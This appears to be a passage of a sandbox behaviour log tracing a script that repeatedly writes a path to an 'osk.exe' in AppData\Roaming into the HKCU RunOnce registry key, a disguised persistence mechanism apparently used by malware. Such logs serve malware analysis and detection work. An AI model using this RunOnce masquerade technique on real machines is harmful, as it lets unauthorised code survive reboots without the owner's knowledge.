0x0 [0082.452] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.452] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.453] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.453] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.453] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0082.453] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.453] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x76 [0082.453] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.454] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0082.454] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.454] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.454] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.454] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.454] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.454] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.454] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.454] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.455] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.455] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.455] RegCloseKey (hKey=0x280) returned 0x0 [0082.455] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.455] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.455] SetTimer (hWnd=0x20280, nIDEvent=0x20f1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f1 [0082.455] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.467] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.467] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.468] KillTimer (hWnd=0x20280, uIDEvent=0x20f1) returned 1 [0082.468] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.468] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.468] IUnknown:Release (This=0x787518) returned 0x1 [0082.468] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.468] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.468] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.468] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.468] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.468] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.468] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.469] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.469] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.469] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0082.469] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 
0x0 [0082.469] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x77 [0082.469] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.470] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0082.470] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.470] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.470] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.470] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.470] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.470] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.470] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.470] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.470] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.470] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.470] RegCloseKey (hKey=0x280) returned 0x0 [0082.471] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.471] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.471] SetTimer (hWnd=0x20280, nIDEvent=0x20f2, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f2 [0082.471] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.483] TranslateMessage (lpMsg=0x33f7fc) 
returned 0 [0082.483] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.483] KillTimer (hWnd=0x20280, uIDEvent=0x20f2) returned 1 [0082.483] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.483] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.483] IUnknown:Release (This=0x787518) returned 0x1 [0082.483] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.483] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.484] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.484] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 
[0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.484] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.484] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0082.484] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.484] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x78 [0082.484] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.485] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0082.485] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.485] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.485] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.485] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.485] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.485] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.486] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.486] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.486] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.486] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.486] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.486] RegCloseKey (hKey=0x280) returned 0x0 [0082.486] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.486] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.486] SetTimer (hWnd=0x20280, nIDEvent=0x20f3, uElapse=0xa, lpTimerFunc=0x0) returned 0x20f3 [0082.486] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.498] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.498] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.498] KillTimer (hWnd=0x20280, uIDEvent=0x20f3) returned 1 [0082.499] 
